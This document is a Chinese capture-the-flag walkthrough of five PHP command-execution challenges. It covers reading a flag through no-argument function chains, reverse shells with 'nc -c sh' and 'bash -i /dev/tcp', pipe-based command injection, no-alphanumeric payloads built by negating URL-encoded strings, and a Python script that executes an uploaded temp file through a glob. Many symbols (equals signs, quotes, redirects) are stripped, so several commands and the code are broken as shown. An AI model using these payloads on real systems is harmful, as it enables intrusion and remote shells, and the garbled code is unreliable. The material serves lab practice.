1.一句话木马变形看到了php代码解释器那么就可以输入一些php代码看看是否有什么过滤先输入一个phpinfo();成功返回了php相关信息那么可以尝试一些命令注入system(ls);成功返回了当前目录下的文件看到了flag文件那么就可以直接读取flag文件即可继续使有system函数system(tac fl*);这里提示了过滤信息那么就直接想到了无参数函数只需要函数之间的调用就可以实现读取文件show_source(next(array_reverse(scandir(pos(localeconv())))));这里粗略解释一下具体了解可以问问ai函数作用localeconv()返回系统本地化信息的数组核心数组第一个元素固定是 .当前目录pos()等价于current()获取数组的第一个元素 → 最终得到.当前目录scandir(.)扫描当前目录下的所有文件 / 目录返回数组比如[., .., flag.php, index.php]array_reverse()反转数组 → 比如[index.php, flag.php, .., .]next()将数组指针移到下一个元素并返回反转后数组第一个元素是index.phpnext()取第二个 →flag.phpshow_source()等价于highlight_file()高亮显示指定文件的内容 → 最终显示flag.php2.反弹shell构造刚刚开始还可以和上面的关卡一样测试但是这关只会返回“实现成功”典型的无回显的php想到题目说的反弹shell那么就可以直接进行反弹shell//在kali中输入x是与在题目一样的端口 nc -lvnp x //题目中输入 bash -i /dev/tcp/ip/端口 01 //这里我先是尝试bash但是没有成功说明靶场环境受限制了 nc -c sh ip 端口 //nc是大多数 Linux / 类 Unix 系统默认安装 nc或 busybox nc不管目标机是 bash/dash/sh只要有sh和nc就能执行看到页面一直加载说明就成功了到kail中就可以看到这里还有第二种方法写入静态文件先测试一下这个功能能不能使用echo 1 1.txt //将1写入当前目录的1.txt文档如歌当前目录没有这个文件那么就创建一个我们成功访问到了1.txt中我们写入的内容那么就可以使用这个方法那么就写入执行命令到txt文档中即可echo ls 1.txt echo tac fl* 1.txt //这里使用的是反引号反引号是php执行运算符php将尝试反引号中的内容作为shell命令来执行并将结果输出通过echo就可以输出看到3.管道符绕过过滤这关会自动执行一个ls命令只要能拼接上另外一个命令即可这里使用这些都可以tac fl* tac fl* |tac fl* ;tac fl* ctfshow||tac flag.php4.无字母数字代码执行这关比较特殊尝试了大多数命令都无法执行因为这关禁用了所有的数字和字母但是唯独对其他字符进行限制那我们可以尝试通过其他字符进行转化成为我们需要这里可以使用url编码取反操作?php ​ $systemsystem; ​ $commandtac flag.php; ​ echo (~.urlencode(~$system).)(~.urlencode(~$command).);;//这里记得加上; //下面验证还原 echo (.~urldecode($k1).)(.~urldecode($k2).); ? //使用这三步操作是先将命令取反为了躲避过滤取反一般为不可见字符。然后进行url编码url编码是因为php会自动解码。最后输出时候再在输出语句前面添加上~PHP在解析这段字符时候御剑~会自动取反。5.无字母数字命令执行这关看似和上关类似同样禁用了数字和字母但是发现使用上关相同的payload时并没有输出flag只是输出我们输入的命令。说明大概率为无回显的这里我尝试了写入静态文件也没有成功这里借鉴了别的地方的方法这里先给代码再进行讲解。这段 Python 代码的核心是通过 HTTP POST 请求持续攻击目标服务器利用文件上传 代码注入的方式执行系统命令读取 flag.php并循环检测响应中是否包含CTF{格式的 flag找到后立即输出并停止循环。import requests # 导入发送HTTP请求的库 import time # 导入时间相关库用于循环等待 ​ url http://localhost:5058 # 目标攻击地址本地测试 ​ # 1. 准备要上传的文件payload.txt里写了要执行的命令tac /var/www/html/flag.php file {file: open(payload.txt, r)} ​ # 2. 核心注入payload. /???/????????[-[] —— 这是Linux命令注入的模糊匹配写法 data {code: . /???/????????[-[]} ​ # 3. 无限循环发起请求直到拿到flag while True: # 发送POST请求上传文件 提交注入的code参数 response requests.post(url, filesfile, datadata) # 检测响应中是否包含CTF{flag的特征 if response.text.find(CTF{)! -1: # 提取从CTF{开始到最后一位的内容即完整flag flag response.text[response.text.find(CTF{):-1] print(flag) # 输出flag break # 找到flag后退出循环 else: print(Waiting for flag...) # 未找到则提示 time.sleep(1) # 等待1秒后再次请求这关与web入门中的web55类似那一关只不过可以使用数字就还可以使用其他方法而这关目前也只了解这一种做法我简单讲一下原理我们可以发送一个上传文件的POST包此时PHP会将我们上传的文件保存在临时文件夹下默认的文件名是/tmp/phpXXXXXX文件名最后6个字符是随机的大小写字母。[-[]可以用来通配表示大写字母因为大写字母在与 [之间过滤掉干扰文件最后一位一般为大写而在linux系统下.是可以用来执行任意脚本文件的利用这两点我们可以构造payload。具体操作大家可以尝试一下web55练习一下那关wp我也会给大家借鉴一下。